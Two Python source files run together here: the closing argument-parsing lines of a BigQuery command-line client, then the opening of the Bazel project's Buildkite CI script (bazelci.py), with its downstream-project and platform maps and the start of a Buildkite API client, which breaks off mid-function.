parser = argparse.ArgumentParser()
parser.add_argument("-q", "--query", dest="query", help="provide valid bigquery sql")
parser.add_argument("-f", "--no-flattern", dest="flattern_results", action="store_true", default=True, help="Flattern results")
parser.add_argument("-p", "--project_id", default=None, dest="project", help="provide valid project id")
parser.add_argument("-ssql", "--standard-sql", dest="ssql", default=False, action="store_true", help="Mention if using Standard sql")
parser.add_argument("-dml", "--dml-statement", dest="dml", default=False, action="store_true",
help="Mention if using DML statements in your query")
parser.add_argument("-d", "--destination-table", dest="destination_table", help="<projectname>:<datasetid>.<tableid> provide valid destination project-id")
parser.add_argument("-w", "--write-desposition", default='WRITE_EMPTY', dest="write_desposition", help="Write disposition value")
parser.add_argument("-qf", "--query-file", dest="query_file", help="provide bigquery sql filepath")
parser.add_argument("-t", "--template", default={}, dest="template", help="provide template values")
parser.add_argument("-tf", "--template-file", dest="template_file", help="provide template file path")
parser.add_argument("-s", "--start-date", dest="start_date", help="Provide valid startdate (YYYY-MM-DD)", type=valid_date)
parser.add_argument("-e", "--end-date", dest="end_date", help="Provide valid end date (YYYY-MM-DD)", type=valid_date)
parser.add_argument("-sf", "--service-account-file-path", dest="service_account_path", help="provide valid path of service account json file")
args = parser.parse_args()
if len(sys.argv) <= 1:
parser.print_help()
exit()
bq_client = BigQueryClient(args)
bq_client.controller(args)
# t = Thread(target=bq_client.controller, kwargs={'args':args})
# t.start()
# timeout = 30.0
#
# while t.isAlive():
# time.sleep(0.1)
# timeout -= 0.1
# if timeout == 0.0:
# print 'Please wait...'
# timeout = 30.0
if __name__ == "__main__":
main()
|
bazelci.py
|
#!/usr/bin/env python3
#
# Copyright 2018 The Bazel Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
import base64
import codecs
import datetime
from glob import glob
import hashlib
import json
import multiprocessing
import os
import os.path
import random
import re
import requests
import shutil
import stat
import subprocess
import sys
import tempfile
import threading
import time
import urllib.error
import urllib.request
import uuid
import yaml
# Initialize the random number generator.
random.seed()
BUILDKITE_ORG = os.environ["BUILDKITE_ORGANIZATION_SLUG"]
THIS_IS_PRODUCTION = BUILDKITE_ORG == "bazel"
THIS_IS_TESTING = BUILDKITE_ORG == "bazel-testing"
THIS_IS_TRUSTED = BUILDKITE_ORG == "bazel-trusted"
THIS_IS_SPARTA = True
CLOUD_PROJECT = "bazel-public" if THIS_IS_TRUSTED else "bazel-untrusted"
GITHUB_BRANCH = {"bazel": "master", "bazel-trusted": "master", "bazel-testing": "testing"}[
BUILDKITE_ORG
]
SCRIPT_URL = "https://raw.githubusercontent.com/bazelbuild/continuous-integration/{}/buildkite/bazelci.py?{}".format(
GITHUB_BRANCH, int(time.time())
)
INCOMPATIBLE_FLAG_VERBOSE_FAILURES_URL = "https://raw.githubusercontent.com/bazelbuild/continuous-integration/{}/buildkite/incompatible_flag_verbose_failures.py?{}".format(
GITHUB_BRANCH, int(time.time())
)
AGGREGATE_INCOMPATIBLE_TEST_RESULT_URL = "https://raw.githubusercontent.com/bazelbuild/continuous-integration/{}/buildkite/aggregate_incompatible_flags_test_result.py?{}".format(
GITHUB_BRANCH, int(time.time())
)
EMERGENCY_FILE_URL = "https://raw.githubusercontent.com/bazelbuild/continuous-integration/{}/buildkite/emergency.yml?{}".format(
GITHUB_BRANCH, int(time.time())
)
FLAKY_TESTS_BUCKET = {
"bazel-testing": "gs://bazel-testing-buildkite-stats/flaky-tests-bep/",
"bazel-trusted": "gs://bazel-buildkite-stats/flaky-tests-bep/",
"bazel": "gs://bazel-buildkite-stats/flaky-tests-bep/",
}[BUILDKITE_ORG]
KZIPS_BUCKET = {
"bazel-testing": "gs://bazel-kzips-testing/",
"bazel-trusted": "gs://bazel-kzips/",
"bazel": "gs://bazel-kzips/",
}[BUILDKITE_ORG]
# Projects can opt out of receiving GitHub issues from --notify by adding `"do_not_notify": True` to their respective downstream entry.
DOWNSTREAM_PROJECTS_PRODUCTION = {
"Android Studio Plugin": {
"git_repository": "https://github.com/bazelbuild/intellij.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/intellij/master/.bazelci/android-studio.yml",
"pipeline_slug": "android-studio-plugin",
},
"Android Testing": {
"git_repository": "https://github.com/googlesamples/android-testing.git",
"http_config": "https://raw.githubusercontent.com/googlesamples/android-testing/master/bazelci/buildkite-pipeline.yml",
"pipeline_slug": "android-testing",
"disabled_reason": "https://github.com/android/testing-samples/issues/417",
},
"Bazel": {
"git_repository": "https://github.com/bazelbuild/bazel.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/bazel/master/.bazelci/postsubmit.yml",
"pipeline_slug": "bazel-bazel",
},
"Bazel Bench": {
"git_repository": "https://github.com/bazelbuild/bazel-bench.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/bazel-bench/master/.bazelci/postsubmit.yml",
"pipeline_slug": "bazel-bench",
},
"Bazel Codelabs": {
"git_repository": "https://github.com/bazelbuild/codelabs.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/codelabs/master/.bazelci/presubmit.yml",
"pipeline_slug": "bazel-codelabs",
"disabled_reason": "https://github.com/bazelbuild/codelabs/issues/38",
},
"Bazel Examples": {
"git_repository": "https://github.com/bazelbuild/examples.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/examples/master/.bazelci/presubmit.yml",
"pipeline_slug": "bazel-bazel-examples",
},
"Bazel Federation": {
"git_repository": "https://github.com/bazelbuild/bazel-federation.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/bazel-federation/master/.bazelci/presubmit.yml",
"pipeline_slug": "bazel-federation",
"disabled_reason": "https://github.com/bazelbuild/bazel-federation/issues/126",
},
"Bazel Remote Cache": {
"git_repository": "https://github.com/buchgr/bazel-remote.git",
"http_config": "https://raw.githubusercontent.com/buchgr/bazel-remote/master/.bazelci/presubmit.yml",
"pipeline_slug": "bazel-remote-cache",
},
"Bazel integration testing": {
"git_repository": "https://github.com/bazelbuild/bazel-integration-testing.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/bazel-integration-testing/master/.bazelci/presubmit.yml",
"pipeline_slug": "bazel-integration-testing",
},
"Bazel skylib": {
"git_repository": "https://github.com/bazelbuild/bazel-skylib.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/bazel-skylib/main/.bazelci/presubmit.yml",
"pipeline_slug": "bazel-skylib",
"owned_by_bazel": True,
},
"Bazel toolchains": {
"git_repository": "https://github.com/bazelbuild/bazel-toolchains.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/bazel-toolchains/master/.bazelci/presubmit.yml",
"pipeline_slug": "bazel-toolchains",
},
"Bazel watcher": {
"git_repository": "https://github.com/bazelbuild/bazel-watcher.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/bazel-watcher/master/.bazelci/presubmit.yml",
"pipeline_slug": "bazel-watcher",
},
"Bazelisk": {
"git_repository": "https://github.com/bazelbuild/bazelisk.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/bazelisk/master/.bazelci/config.yml",
"pipeline_slug": "bazelisk",
},
"Buildfarm": {
"git_repository": "https://github.com/bazelbuild/bazel-buildfarm.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/bazel-buildfarm/main/.bazelci/presubmit.yml",
"pipeline_slug": "buildfarm-farmer",
},
"Buildtools": {
"git_repository": "https://github.com/bazelbuild/buildtools.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/buildtools/master/.bazelci/presubmit.yml",
"pipeline_slug": "buildtools",
},
"Cargo-Raze": {
"git_repository": "https://github.com/google/cargo-raze.git",
"http_config": "https://raw.githubusercontent.com/google/cargo-raze/main/.bazelci/presubmit.yml",
"pipeline_slug": "cargo-raze",
},
"CLion Plugin": {
"git_repository": "https://github.com/bazelbuild/intellij.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/intellij/master/.bazelci/clion.yml",
"pipeline_slug": "clion-plugin",
},
"Cartographer": {
"git_repository": "https://github.com/googlecartographer/cartographer.git",
"http_config": "https://raw.githubusercontent.com/googlecartographer/cartographer/master/.bazelci/presubmit.yml",
"pipeline_slug": "cartographer",
},
"Cloud Robotics Core": {
"git_repository": "https://github.com/googlecloudrobotics/core.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/continuous-integration/master/pipelines/cloud-robotics.yml",
"pipeline_slug": "cloud-robotics-core",
},
"Envoy": {
"git_repository": "https://github.com/envoyproxy/envoy.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/continuous-integration/master/pipelines/envoy.yml",
"pipeline_slug": "envoy",
},
"FlatBuffers": {
"git_repository": "https://github.com/google/flatbuffers.git",
"http_config": "https://raw.githubusercontent.com/google/flatbuffers/master/.bazelci/presubmit.yml",
"pipeline_slug": "flatbuffers",
"disabled_reason": "https://github.com/bazelbuild/bazel/issues/13811",
},
"Flogger": {
"git_repository": "https://github.com/google/flogger.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/continuous-integration/master/pipelines/flogger.yml",
"pipeline_slug": "flogger",
},
"Gerrit": {
"git_repository": "https://gerrit.googlesource.com/gerrit.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/continuous-integration/master/pipelines/gerrit.yml",
"pipeline_slug": "gerrit",
"disabled_reason": "https://github.com/bazelbuild/continuous-integration/issues/1182",
},
"Google Logging": {
"git_repository": "https://github.com/google/glog.git",
"http_config": "https://raw.githubusercontent.com/google/glog/master/.bazelci/presubmit.yml",
"pipeline_slug": "google-logging",
},
"IntelliJ Plugin": {
"git_repository": "https://github.com/bazelbuild/intellij.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/intellij/master/.bazelci/intellij.yml",
"pipeline_slug": "intellij-plugin",
},
"IntelliJ Plugin Aspect": {
"git_repository": "https://github.com/bazelbuild/intellij.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/intellij/master/.bazelci/aspect.yml",
"pipeline_slug": "intellij-plugin-aspect",
},
"Kythe": {
"git_repository": "https://github.com/kythe/kythe.git",
"http_config": "https://raw.githubusercontent.com/kythe/kythe/master/.bazelci/presubmit.yml",
"pipeline_slug": "kythe",
},
"Protobuf": {
"git_repository": "https://github.com/google/protobuf.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/continuous-integration/master/pipelines/protobuf.yml",
"pipeline_slug": "protobuf",
"owned_by_bazel": True,
},
"Stardoc": {
"git_repository": "https://github.com/bazelbuild/stardoc.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/stardoc/master/.bazelci/presubmit.yml",
"pipeline_slug": "stardoc",
"owned_by_bazel": True,
},
"Subpar": {
"git_repository": "https://github.com/google/subpar.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/continuous-integration/master/pipelines/subpar.yml",
"pipeline_slug": "subpar",
"owned_by_bazel": True,
"disabled_reason": "https://github.com/google/subpar/issues/133",
},
"TensorFlow": {
"git_repository": "https://github.com/tensorflow/tensorflow.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/continuous-integration/master/pipelines/tensorflow.yml",
"pipeline_slug": "tensorflow",
"disabled_reason": "https://github.com/bazelbuild/bazel/issues/13811",
},
"Tulsi": {
"git_repository": "https://github.com/bazelbuild/tulsi.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/tulsi/master/.bazelci/presubmit.yml",
"pipeline_slug": "tulsi-bazel-darwin",
"disabled_reason": "https://github.com/bazelbuild/tulsi/issues/286",
},
"re2": {
"git_repository": "https://github.com/google/re2.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/continuous-integration/master/pipelines/re2.yml",
"pipeline_slug": "re2",
},
"rules_android": {
"git_repository": "https://github.com/bazelbuild/rules_android.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/rules_android/master/.bazelci/postsubmit.yml",
"pipeline_slug": "rules-android",
"disabled_reason": "https://github.com/bazelbuild/rules_android/issues/15",
},
"rules_appengine": {
"git_repository": "https://github.com/bazelbuild/rules_appengine.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/rules_appengine/master/.bazelci/presubmit.yml",
"pipeline_slug": "rules-appengine-appengine",
},
"rules_apple": {
"git_repository": "https://github.com/bazelbuild/rules_apple.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/rules_apple/master/.bazelci/presubmit.yml",
"pipeline_slug": "rules-apple-darwin",
},
"rules_cc": {
"git_repository": "https://github.com/bazelbuild/rules_cc.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/rules_cc/main/.bazelci/presubmit.yml",
"pipeline_slug": "rules-cc",
"owned_by_bazel": True,
},
"rules_closure": {
"git_repository": "https://github.com/bazelbuild/rules_closure.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/rules_closure/master/.bazelci/presubmit.yml",
"pipeline_slug": "rules-closure-closure-compiler",
"owned_by_bazel": True,
},
"rules_docker": {
"git_repository": "https://github.com/bazelbuild/rules_docker.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/rules_docker/master/.bazelci/presubmit.yml",
"pipeline_slug": "rules-docker-docker",
},
"rules_dotnet": {
"git_repository": "https://github.com/bazelbuild/rules_dotnet.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/rules_dotnet/master/.bazelci/presubmit.yml",
"pipeline_slug": "rules-dotnet-edge",
},
"rules_foreign_cc": {
"git_repository": "https://github.com/bazelbuild/rules_foreign_cc.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/rules_foreign_cc/main/.bazelci/config.yaml",
"pipeline_slug": "rules-foreign-cc",
"owned_by_bazel": True,
},
"rules_go": {
"git_repository": "https://github.com/bazelbuild/rules_go.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/rules_go/master/.bazelci/presubmit.yml",
"pipeline_slug": "rules-go-golang",
},
"rules_groovy": {
"git_repository": "https://github.com/bazelbuild/rules_groovy.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/rules_groovy/master/.bazelci/presubmit.yml",
"pipeline_slug": "rules-groovy",
},
"rules_gwt": {
"git_repository": "https://github.com/bazelbuild/rules_gwt.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/rules_gwt/master/.bazelci/presubmit.yml",
"pipeline_slug": "rules-gwt",
"disabled_reason": "https://github.com/bazelbuild/continuous-integration/issues/1202",
},
"rules_haskell": {
"git_repository": "https://github.com/tweag/rules_haskell.git",
"http_config": "https://raw.githubusercontent.com/tweag/rules_haskell/master/.bazelci/presubmit.yml",
"pipeline_slug": "rules-haskell-haskell",
"disabled_reason": "https://github.com/tweag/rules_haskell/issues/1650",
},
"rules_jsonnet": {
"git_repository": "https://github.com/bazelbuild/rules_jsonnet.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/rules_jsonnet/master/.bazelci/presubmit.yml",
"pipeline_slug": "rules-jsonnet",
},
"rules_jvm_external": {
"git_repository": "https://github.com/bazelbuild/rules_jvm_external.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/rules_jvm_external/master/.bazelci/presubmit.yml",
"pipeline_slug": "rules-jvm-external",
"owned_by_bazel": True,
},
"rules_jvm_external - examples": {
"git_repository": "https://github.com/bazelbuild/rules_jvm_external.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/rules_jvm_external/master/.bazelci/examples.yml",
"pipeline_slug": "rules-jvm-external-examples",
"owned_by_bazel": True,
},
"rules_k8s": {
"git_repository": "https://github.com/bazelbuild/rules_k8s.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/rules_k8s/master/.bazelci/presubmit.yml",
"pipeline_slug": "rules-k8s-k8s",
"disabled_reason": "https://github.com/bazelbuild/rules_k8s/issues/668",
},
"rules_kotlin": {
"git_repository": "https://github.com/bazelbuild/rules_kotlin.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/rules_kotlin/master/.bazelci/presubmit.yml",
"pipeline_slug": "rules-kotlin-kotlin",
},
"rules_nodejs": {
"git_repository": "https://github.com/bazelbuild/rules_nodejs.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/rules_nodejs/stable/.bazelci/presubmit.yml",
"pipeline_slug": "rules-nodejs-nodejs",
},
"rules_perl": {
"git_repository": "https://github.com/bazelbuild/rules_perl.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/rules_perl/master/.bazelci/presubmit.yml",
"pipeline_slug": "rules-perl",
},
"rules_proto": {
"git_repository": "https://github.com/bazelbuild/rules_proto.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/rules_proto/master/.bazelci/presubmit.yml",
"pipeline_slug": "rules-proto",
"owned_by_bazel": True,
},
"rules_python": {
"git_repository": "https://github.com/bazelbuild/rules_python.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/rules_python/main/.bazelci/presubmit.yml",
"pipeline_slug": "rules-python-python",
"owned_by_bazel": True,
},
"rules_rust": {
"git_repository": "https://github.com/bazelbuild/rules_rust.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/rules_rust/master/.bazelci/presubmit.yml",
"pipeline_slug": "rules-rust-rustlang",
},
"rules_sass": {
"git_repository": "https://github.com/bazelbuild/rules_sass.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/rules_sass/master/.bazelci/presubmit.yml",
"pipeline_slug": "rules-sass",
},
"rules_scala": {
"git_repository": "https://github.com/bazelbuild/rules_scala.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/rules_scala/master/.bazelci/presubmit.yml",
"pipeline_slug": "rules-scala-scala",
"disabled_reason": "https://github.com/bazelbuild/rules_scala/issues/1224",
},
"rules_swift": {
"git_repository": "https://github.com/bazelbuild/rules_swift.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/rules_swift/master/.bazelci/presubmit.yml",
"pipeline_slug": "rules-swift-swift",
"do_not_notify": "https://github.com/bazelbuild/continuous-integration/issues/915",
},
"rules_webtesting": {
"git_repository": "https://github.com/bazelbuild/rules_webtesting.git",
"http_config": "https://raw.githubusercontent.com/bazelbuild/rules_webtesting/master/.bazelci/presubmit.yml",
"pipeline_slug": "rules-webtesting-saucelabs",
},
"upb": {
"git_repository": "https://github.com/protocolbuffers/upb.git",
"http_config": "https://raw.githubusercontent.com/protocolbuffers/upb/master/.bazelci/presubmit.yml",
"pipeline_slug": "upb",
},
}
DOWNSTREAM_PROJECTS_TESTING = {
"Bazel": DOWNSTREAM_PROJECTS_PRODUCTION["Bazel"],
"Bazelisk": DOWNSTREAM_PROJECTS_PRODUCTION["Bazelisk"],
"Federation": {
"git_repository": "https://github.com/fweikert/bazel-federation.git",
"http_config": "https://raw.githubusercontent.com/fweikert/bazel-federation/master/.bazelci/presubmit.yml",
"pipeline_slug": "bazel-federation",
},
"rules_docker": DOWNSTREAM_PROJECTS_PRODUCTION["rules_docker"],
"rules_go": DOWNSTREAM_PROJECTS_PRODUCTION["rules_go"],
"rules_groovy": DOWNSTREAM_PROJECTS_PRODUCTION["rules_groovy"],
"rules_kotlin": DOWNSTREAM_PROJECTS_PRODUCTION["rules_kotlin"],
"rules_nodejs": DOWNSTREAM_PROJECTS_PRODUCTION["rules_nodejs"],
"rules_rust": DOWNSTREAM_PROJECTS_PRODUCTION["rules_rust"],
"rules_scala": DOWNSTREAM_PROJECTS_PRODUCTION["rules_scala"],
}
DOWNSTREAM_PROJECTS = {
"bazel-testing": DOWNSTREAM_PROJECTS_TESTING,
"bazel-trusted": {},
"bazel": DOWNSTREAM_PROJECTS_PRODUCTION,
}[BUILDKITE_ORG]
DOCKER_REGISTRY_PREFIX = {
"bazel-testing": "bazel-public/testing",
"bazel-trusted": "bazel-public",
"bazel": "bazel-public",
}[BUILDKITE_ORG]
# A map containing all supported platform names as keys, with the values being
# the platform name in a human readable format, and a the buildkite-agent's
# working directory.
PLATFORMS = {
"centos7": {
"name": "CentOS 7 (OpenJDK 8, gcc 4.8.5)",
"emoji-name": ":centos: 7 (OpenJDK 8, gcc 4.8.5)",
"downstream-root": "/var/lib/buildkite-agent/builds/${BUILDKITE_AGENT_NAME}/${BUILDKITE_ORGANIZATION_SLUG}-downstream-projects",
"publish_binary": [],
"docker-image": f"gcr.io/{DOCKER_REGISTRY_PREFIX}/centos7-java8",
"python": "python3.6",
},
"centos7_java11": {
"name": "CentOS 7 (OpenJDK 11, gcc 4.8.5)",
"emoji-name": ":centos: 7 (OpenJDK 11, gcc 4.8.5)",
"downstream-root": "/var/lib/buildkite-agent/builds/${BUILDKITE_AGENT_NAME}/${BUILDKITE_ORGANIZATION_SLUG}-downstream-projects",
"publish_binary": [],
"docker-image": f"gcr.io/{DOCKER_REGISTRY_PREFIX}/centos7-java11",
"python": "python3.6",
},
"centos7_java11_devtoolset10": {
"name": "CentOS 7 (OpenJDK 11, gcc 10.2.1)",
"emoji-name": ":centos: 7 (OpenJDK 11, gcc 10.2.1)",
"downstream-root": "/var/lib/buildkite-agent/builds/${BUILDKITE_AGENT_NAME}/${BUILDKITE_ORGANIZATION_SLUG}-downstream-projects",
"publish_binary": ["ubuntu1404", "centos7", "linux"],
"docker-image": f"gcr.io/{DOCKER_REGISTRY_PREFIX}/centos7-java11-devtoolset10",
"python": "python3.6",
},
"debian10": {
"name": "Debian 10 Buster (OpenJDK 11, gcc 8.3.0)",
"emoji-name": ":debian: 10 Buster (OpenJDK 11, gcc 8.3.0)",
"downstream-root": "/var/lib/buildkite-agent/builds/${BUILDKITE_AGENT_NAME}/${BUILDKITE_ORGANIZATION_SLUG}-downstream-projects",
"publish_binary": [],
"docker-image": f"gcr.io/{DOCKER_REGISTRY_PREFIX}/debian10-java11",
"python": "python3.7",
},
"debian11": {
"name": "Debian 11 Bullseye (OpenJDK 17, gcc 10.2.1)",
"emoji-name": ":debian: 11 Buster (OpenJDK 17, gcc 10.2.1)",
"downstream-root": "/var/lib/buildkite-agent/builds/${BUILDKITE_AGENT_NAME}/${BUILDKITE_ORGANIZATION_SLUG}-downstream-projects",
"publish_binary": [],
"docker-image": f"gcr.io/{DOCKER_REGISTRY_PREFIX}/debian11-java17",
"python": "python3.9",
},
"ubuntu1604": {
"name": "Ubuntu 16.04 LTS (OpenJDK 8, gcc 5.4.0)",
"emoji-name": ":ubuntu: 16.04 LTS (OpenJDK 8, gcc 5.4.0)",
"downstream-root": "/var/lib/buildkite-agent/builds/${BUILDKITE_AGENT_NAME}/${BUILDKITE_ORGANIZATION_SLUG}-downstream-projects",
"publish_binary": [],
"docker-image": f"gcr.io/{DOCKER_REGISTRY_PREFIX}/ubuntu1604-java8",
"python": "python3.6",
},
"ubuntu1804": {
"name": "Ubuntu 18.04 LTS (OpenJDK 11, gcc 7.4.0)",
"emoji-name": ":ubuntu: 18.04 LTS (OpenJDK 11, gcc 7.4.0)",
"downstream-root": "/var/lib/buildkite-agent/builds/${BUILDKITE_AGENT_NAME}/${BUILDKITE_ORGANIZATION_SLUG}-downstream-projects",
"publish_binary": ["ubuntu1804"],
"docker-image": f"gcr.io/{DOCKER_REGISTRY_PREFIX}/ubuntu1804-java11",
"python": "python3.6",
},
"ubuntu2004": {
"name": "Ubuntu 20.04 LTS (OpenJDK 11, gcc 9.3.0)",
"emoji-name": ":ubuntu: 20.04 LTS (OpenJDK 11, gcc 9.3.0)",
"downstream-root": "/var/lib/buildkite-agent/builds/${BUILDKITE_AGENT_NAME}/${BUILDKITE_ORGANIZATION_SLUG}-downstream-projects",
"publish_binary": [],
"docker-image": f"gcr.io/{DOCKER_REGISTRY_PREFIX}/ubuntu2004-java11",
"python": "python3.8",
},
"kythe_ubuntu2004": {
"name": "Kythe (Ubuntu 20.04 LTS, OpenJDK 11, gcc 9.3.0)",
"emoji-name": "Kythe (:ubuntu: 20.04 LTS, OpenJDK 11, gcc 9.3.0)",
"downstream-root": "/var/lib/buildkite-agent/builds/${BUILDKITE_AGENT_NAME}/${BUILDKITE_ORGANIZATION_SLUG}-downstream-projects",
"publish_binary": [],
"docker-image": f"gcr.io/{DOCKER_REGISTRY_PREFIX}/ubuntu2004-java11-kythe",
"python": "python3.8",
},
"ubuntu2104": {
"name": "Ubuntu 21.04 (OpenJDK 11, gcc 10.3.0)",
"emoji-name": ":ubuntu: 21.04 (OpenJDK 11, gcc 10.3.0)",
"downstream-root": "/var/lib/buildkite-agent/builds/${BUILDKITE_AGENT_NAME}/${BUILDKITE_ORGANIZATION_SLUG}-downstream-projects",
"publish_binary": [],
"docker-image": f"gcr.io/{DOCKER_REGISTRY_PREFIX}/ubuntu2104-java11",
"python": "python3",
},
"ubuntu2110": {
"name": "Ubuntu 21.10 (OpenJDK 17, gcc 11.2.0)",
"emoji-name": ":ubuntu: 21.10 (OpenJDK 11, gcc 11.2.0)",
"downstream-root": "/var/lib/buildkite-agent/builds/${BUILDKITE_AGENT_NAME}/${BUILDKITE_ORGANIZATION_SLUG}-downstream-projects",
"publish_binary": [],
"docker-image": f"gcr.io/{DOCKER_REGISTRY_PREFIX}/ubuntu2110-java17",
"python": "python3",
},
"macos": {
"name": "macOS (OpenJDK 11, Xcode)",
"emoji-name": ":darwin: (OpenJDK 11, Xcode)",
"downstream-root": "/Users/buildkite/builds/${BUILDKITE_AGENT_NAME}/${BUILDKITE_ORGANIZATION_SLUG}-downstream-projects",
"publish_binary": ["macos"],
"queue": "macos",
"python": "python3",
},
"macos_arm64": {
"name": "macOS arm64 (OpenJDK 8, Xcode)",
"emoji-name": ":darwin: arm64 (OpenJDK 8, Xcode)",
"downstream-root": "/Users/buildkite/builds/${BUILDKITE_AGENT_NAME}/${BUILDKITE_ORGANIZATION_SLUG}-downstream-projects",
"publish_binary": ["macos_arm64"],
# TODO(pcloudy): Switch to macos_arm64 queue when Apple Silicon machines are available,
# current we just use x86_64 machines to do cross compile.
"queue": "macos",
"python": "python3",
},
"windows": {
"name": "Windows (OpenJDK 11, VS2017)",
"emoji-name": ":windows: (OpenJDK 11, VS2017)",
"downstream-root": "c:/b/${BUILDKITE_AGENT_NAME}/${BUILDKITE_ORGANIZATION_SLUG}-downstream-projects",
"publish_binary": ["windows"],
"queue": "windows",
"python": "python.exe",
},
"rbe_ubuntu1604": {
"name": "RBE (Ubuntu 16.04, OpenJDK 8)",
"emoji-name": "RBE (:ubuntu: 16.04, OpenJDK 8)",
"downstream-root": "/var/lib/buildkite-agent/builds/${BUILDKITE_AGENT_NAME}/${BUILDKITE_ORGANIZATION_SLUG}-downstream-projects",
"publish_binary": [],
"docker-image": f"gcr.io/{DOCKER_REGISTRY_PREFIX}/ubuntu1604-java8",
"python": "python3.6",
},
}
BUILDIFIER_DOCKER_IMAGE = "gcr.io/bazel-public/buildifier"
# The platform used for various steps (e.g. stuff that formerly ran on the "pipeline" workers).
DEFAULT_PLATFORM = "ubuntu1804"
# In order to test that "the one Linux binary" that we build for our official releases actually
# works on all Linux distributions that we test on, we use the Linux binary built on our official
# release platform for all Linux downstream tests.
LINUX_BINARY_PLATFORM = "centos7_java11_devtoolset10"
DEFAULT_XCODE_VERSION = "13.0"
XCODE_VERSION_REGEX = re.compile(r"^\d+\.\d+(\.\d+)?$")
XCODE_VERSION_OVERRIDES = {"10.2.1": "10.3", "11.2": "11.2.1", "11.3": "11.3.1"}
BUILD_LABEL_PATTERN = re.compile(r"^Build label: (\S+)$", re.MULTILINE)
BUILDIFIER_STEP_NAME = "Buildifier"
SKIP_TASKS_ENV_VAR = "CI_SKIP_TASKS"
CONFIG_FILE_EXTENSIONS = {".yml", ".yaml"}
KYTHE_DIR = "/usr/local/kythe"
INDEX_UPLOAD_POLICY_ALWAYS = "Always"
INDEX_UPLOAD_POLICY_IF_BUILD_SUCCESS = "IfBuildSuccess"
INDEX_UPLOAD_POLICY_NEVER = "Never"
class BuildkiteException(Exception):
"""
Raised whenever something goes wrong and we should exit with an error.
"""
pass
class BinaryUploadRaceException(Exception):
"""
Raised when try_publish_binaries wasn't able to publish a set of binaries,
because the generation of the current file didn't match the expected value.
"""
pass
class BuildkiteClient(object):
_ENCRYPTED_BUILDKITE_API_TOKEN = """
CiQA4DEB9ldzC+E39KomywtqXfaQ86hhulgeDsicds2BuvbCYzsSUAAqwcvXZPh9IMWlwWh94J2F
exosKKaWB0tSRJiPKnv2NPDfEqGul0ZwVjtWeASpugwxxKeLhFhPMcgHMPfndH6j2GEIY6nkKRbP
uwoRMCwe
""".strip()
_ENCRYPTED_BUILDKITE_API_TESTING_TOKEN = """
CiQAMTBkWjL1C+F5oon3+cC1vmum5+c1y5+96WQY44p0Lxd0PeASUQAy7iU0c6E3W5EOSFYfD5fA
MWy/SHaMno1NQSUa4xDOl5yc2kizrtxPPVkX4x9pLNuGUY/xwAn2n1DdiUdWZNWlY1bX2C4ex65e
P9w8kNhEbw==
""".strip()
_BUILD_STATUS_URL_TEMPLATE = (
"https://api.buildkite.com/v2/organizations/{}/pipelines/{}/builds/{}"
)
_NEW_BUILD_URL_TEMPLATE = "https://api.buildkite.com/v2/organizations/{}/pipelines/{}/builds"
_RETRY_JOB_URL_TEMPLATE = (
"https://api.buildkite.com/v2/organizations/{}/pipelines/{}/builds/{}/jobs/{}/retry"
)
def __init__(self, org, pipeline):
self._org = org
self._pipeline = pipeline
self._token = self._get_buildkite_token()
def _get_buildkite_token(self):
return decrypt_token(
encrypted_token=self._ENCRYPTED_BUILDKITE_API_TESTING_TOKEN
if THIS_IS_TESTING
else self._ENCRYPTED_BUILDKITE_API_TOKEN,
kms_key="buildkite-testing-api-token"
if THIS_IS_TESTING
else "buildkite-untrusted-api-token",
)
def _open_url(self, url, params=[]):
try:
params_str = "".join("&{}={}".format(k, v) for k, v in params)
